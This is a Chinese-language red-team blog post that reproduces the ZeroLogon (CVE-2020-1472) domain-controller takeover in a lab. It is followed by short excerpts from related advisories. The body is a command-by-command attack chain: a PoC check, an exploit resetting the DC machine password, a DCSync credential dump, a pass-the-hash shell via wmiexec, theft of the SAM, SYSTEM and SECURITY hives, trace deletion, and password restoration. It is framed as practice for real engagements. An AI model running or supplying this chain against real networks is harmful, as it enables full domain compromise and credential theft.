NetLogon 域內提權漏洞(CVE-2020-1472)復現過程

2021-02-14 滲透攻擊紅隊

大家好,這裡是 滲透攻擊紅隊 的第 46 篇文章,本公眾號會記錄一些紅隊攻擊的筆記(由淺到深),不定時更新

CVE-2020-1472是一個windows域控中嚴重的遠程權限提升漏洞,攻擊者通過NetLogon,建立與域控間易受攻擊的安全通道時,可利用此漏洞獲取域管訪問權限。

Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2012Windows Server 2012 (Server Core installation)Windows Server 2012 R2Windows Server 2012 R2 (Server Core installation)Windows Server 2016Windows Server 2016 (Server Core installation)Windows Server 2019Windows Server 2019 (Server Core installation)Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)
復現過程
域控IP:192.168.159.149
域內跳板IP:192.168.159.154
域:Motoo.nc
查看域控的主機名:
net group "domain controllers" /domain
可以看到 Motoo-DCSRV 是域控的主機名!
首先通過 Poc 檢測漏洞是否存在:
python3 cve-2020-1472-poc.py Motoo-DCSRV 192.168.159.149
返回 Success,說明漏洞存在!
使用 exploit 漏洞腳本將域控機器帳號重置:
python3 cve-2020-1472-exploit.py Motoo-DCSRV 192.168.159.149
之後使用 DCSync 導出域內所有用戶的憑證:(主要有四個空格)
python3 secretsdump.py Motoo.nc/Motoo-DCSRV$@192.168.159.149    -no-pass
得到了域控的 Hash:
Motoo.nc\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7c85389bc79a4eb184e620b6e8c37905
然後再通過 wmic hash 傳遞:
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7c85389bc79a4eb184e620b6e8c37905 Motoo.nc/Administrator@192.168.159.149
然後通過導出 sam system 等文件到本地,獲取域控機器上本地保存之前的 hash 值用於恢復,不然就脫域了:
reg save HKLM\SYSTEM system.savereg save HKLM\SAM sam.savereg save HKLM\SECURITY security.saveget system.saveget sam.saveget security.save 
記得下載完後刪除痕跡文件:
之後你會發現再你的當前機器會生成幾個文件:sam.save、security.save、system.save
之後通過 sam.save、security.save、system.save  這些文件獲得原來域控機器上的 Ntlm Hash 值,用於恢復密碼:
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
通過拿到 $MACHINE.ACC: 的值,然後進行恢復:注意只有後半部分:
$MACHINE.ACC: 的值$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:ce7b34c0f2c72d6cb03123ef5ff741ca
python3 reinstall_original_pw.py Motoo-DCSRV 192.168.159.149 ce7b34c0f2c72d6cb03123ef5ff741ca
這個時候你還可以使用腳本來檢測是否恢復密碼成功:
python3 secretsdump.py Motoo.nc/Motoo-DCSRV$@192.168.159.149 -just-dc-no-pass
或者還可以使用這個:注意四個空格
python3 secretsdump.py Motoo.nc/Motoo-DCSRV$@192.168.159.149    -no-pass
可以看到我們使用空密碼去獲取域內的所有用戶的憑證已經不行了:
這個時候才是真正恢復成功!大家在實戰的時候一定要在本地多次復現!別在實戰中重置了域控的密碼為空,結果你不會還原導致目標脫域了,你就GG了!

相關焦點

  • ZeroLogon(CVE-2020-1472) 分析與狩獵
    2020年9月11日,安全公司Secura發布了公告,披露了Microsoft在2020年8月修補的漏洞細節(CVE-2020-1472
  • 漏洞風險提示|Netlogon 特權提升漏洞(CVE-2020-1472)
    Netlogon 特權提升漏洞(CVE-2020-1472)NetLogon 遠程協議是一種在 Windows 域控上使用的 RPC 接口,被用於各種與用戶和機器認證相關的任務。微軟MSRC於8月11日 發布了Netlogon 特權提升漏洞安全通告。此漏洞CVE編號CVE-2020-1472, CVSS 評分:10.0。由 Secura 公司的 Tom Tervoort 發現提交並命名為 ZeroLogon。在9月11日,漏洞發現者在 GitHub 上公開了漏洞測試工具並且放出了漏洞白皮書。
  • CVE-2020-1472 NetLogon 權限提升漏洞研究
    CVE-2020-1472 NetLogon 權限提升漏洞是微軟8月份發布安全公告披露的緊急漏洞,CVSS漏洞評分10分,漏洞利用後果嚴重,未經身份認證的攻擊者可通過使用 Netlogon 遠程協議(MS-NRPC)連接域控制器來利用此漏洞。成功利用此漏洞的攻擊者可獲得域管理員訪問權限。
  • CVE-2020-1472漏洞分析
    Netlogon 特權提升漏洞(CVE-2020-1472)
  • CVE-2020-1472: NetLogon特權提升漏洞分析
    漏洞點在於進行AES加密運算過程中,使用了AES-CFB8模式並且錯誤的將IV設置為全零。0x04 漏洞利用抓取netlogon 進行驗證的幾種包進行分析,wireshark 過濾包信息:netlogon.opnum == 4 || netlogon.opnum == 26 || netlogon.opnum == 30攻擊者ip(域內的一臺機器):192.168.148.138受害者ip(域控伺服器):192.168.148.134
  • CVE-2020-1472 Netlogon權限提升漏洞分析
    目錄 一、漏洞信息      1. 漏洞簡述      2. 組件概述      3. 漏洞利用      4. 漏洞影響      5. 解決方案二、漏洞復現       1.漏洞防禦          1)流量側          2)終端側五、參考文獻六、特別聲明CVE-2020-1472,也稱Zerologon漏洞。該漏洞為微軟2020年8月份補丁日例行更新時公開的漏洞,以其10分的CVSS評分在當時引起諸多研究員重視。
  • 【漏洞通報】微軟NetLogon提權漏洞
    近日,奇安信CERT監測到國外安全廠商發布了NetLogon 權限提升漏洞(CVE-2020-1472)的詳細技術分析文章和驗證腳本。此漏洞是微軟8月份發布安全公告披露的緊急漏洞,CVSS漏洞評分10分,漏洞利用後果嚴重,未經身份認證的攻擊者可通過使用 Netlogon 遠程協議(MS-NRPC)連接域控制器來利用此漏洞。成功利用此漏洞的攻擊者可獲得域管理員訪問權限。
  • CVE-2020-1472漏洞實戰 深度剖析
    CVE-2020-1472是繼MS17010之後一個比較好用的內網提權漏洞,影響Windows Server 2008R 2至Windows Server 2019的多個版本系統,只要攻擊者能訪問到目標域控井且知道域控計算機名即可利用該漏洞.該漏洞不要求當前計算機在域內,也不要求當前計算機作業系統為windows
  • Netlogon 特權提升漏洞(CVE-2020-1472)原理分析與驗證
    CVE-2020-1472是一個windows域控中嚴重的遠程權限提升漏洞。它是因為微軟在Netlogon協議中沒有正確使用加密算法而導致的漏洞。由於微軟在進行AES加密運算過程中,使用了AES-CFB8模式並且錯誤的將IV設置為全零,這使得攻擊者在明文(client challenge)、IV等要素可控的情況下,存在較高概率使得產生的密文為全零。下面就整個攻擊過程做一個簡要分析。
  • CVE-2020-1472 NetLogon特權提升漏洞深入分析
    近日,大連網絡安全信息通報機制合作單位新華三集團提醒,微軟發布補丁修復了NetLogon權限提升漏洞(CVE-2020-1472,Zerologon),漏洞等級為嚴重級別 ,CVSS漏洞評分10分。漏洞背景2020年8月13日,微軟發布補丁修復了NetLogon權限提升漏洞(CVE-2020-1472,Zerologon),漏洞等級為嚴重級別 ,CVSS漏洞評分10分。2020年9月,國外安全廠商公開發布了NetLogon權限提升漏洞的驗證腳本和詳細的技術分析,同時該漏洞的利用工具也在github上公開,導致該漏洞被廣泛利用的風險大大提升。
  • CVE-2020-11107:XAMPP任意命令執行漏洞復現
    *,<7.4.40x03環境搭建● 漏洞環境:1.準備一臺裝有window系統的虛擬機,本次復現以windows10系統為例。 2.下載XAMPP,本次復現以7.2.25版本為例,下載地址:連結:https://pan.baidu.com/s/1U2w-5cIysbEIwtF9YYfOsQ 提取碼:oi88其他漏洞版本下載地址:https://sourceforge.net/projects/xampp/files/● 環境安裝和配置:
  • 技術乾貨 | CVE-2020-1472 ZeroLogon漏洞分析利用
    歡迎各位添加微信號:asj-jacky加入安世加 交流群 和大佬們一起交流安全技術0x01漏洞簡介CVE-2020-1472是一個windows域控中嚴重的遠程權限提升漏洞,此漏洞是微軟8月份發布安全公告披露的緊急漏洞,CVSS評分為10分。
  • 【漏洞預警】(CVE-2020-1472)被黑客廣泛應用
    2020年8月12日,阿里雲應急響應中心監測到,微軟發布了補丁來修復NetLogon特權升級漏洞(CVE-2020-1472),CVSS評分為10
  • 技術乾貨 | 漏洞復現:CVE-2020-0796(SMBv3遠程代碼執行)漏洞復現
    目錄CVE-2020-0796    漏洞描述    漏洞危害等級            影響版本    漏洞復現    實現本地提權CVE-2020-0796漏洞描述>      2020年3月10日,微軟在其官方SRC發布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客戶端和服務端存在遠程代碼執行漏洞。
  • CVE-2020-2883漏洞復現
    簡介在Oracle官方發布的2020年4月關鍵補丁更新公告CPU(Critical Patch
  • ZeroLogon漏洞(CVE-2020-1472)防禦性指南
    關於Zerologon(CVE-2020-1472)2020年09月11日,安全研究專家Tom Tomvvort發布了一篇安全博文
  • 【賊詳細 | 附PoC工具】Apache HTTPd最新RCE漏洞復現
    0x06 漏洞復現:PoC:/blob/master/pocsuite3/pocs/20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py說到這裡就簡要介紹一下個人感覺非常好用的一款神器pocsuite3    PocSuite3是Knownsec 404安全研究團隊設計的一款遠程漏洞測試以及
  • Kerberos域用戶提權漏洞(MS14-068)分析與防範
    大家好,這裡是 滲透攻擊紅隊 的第 36 篇文章,本公眾號會記錄一些我學習紅隊攻擊的復現筆記(由淺到深),不出意外每天一更Kerberos 域用戶提權漏洞(MS14-068,CVE-2014-6324),所有 Windows 伺服器都會收到該漏洞影響
  • 【超詳細 | 附PoC】CVE-2021-2109 | Weblogic Server遠程代碼執行漏洞復現
    漏洞主要由JNDI注入,導致攻擊者可利用此漏洞遠程代碼執行。Server 10.3.6.0.0    Weblogic Server 12.1.3.0.0    Weblogic Server 12.2.1.3.0    Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.00x03 環境搭建本次環境用的之前搭建的,不做過多介紹,詳細搭建過程參考上一篇
  • ZeroLogon(CVE-2020-1472) 漏洞的攻擊與防禦策略(上)
    什麼是ZeroLogon?Zerologon漏洞也稱為CVE-2020-1472,它影響MS-NRPC所使用的加密身份驗證方案(AES-CFB8),該方案具有多種用途,但最廣為人知的原因是更改計算機帳戶密碼的能力,這可能導致Windows被攻擊。該漏洞影響重大,風險評分達10.0滿分。微軟已在8月Patch Tuesday安全更新中將之修復。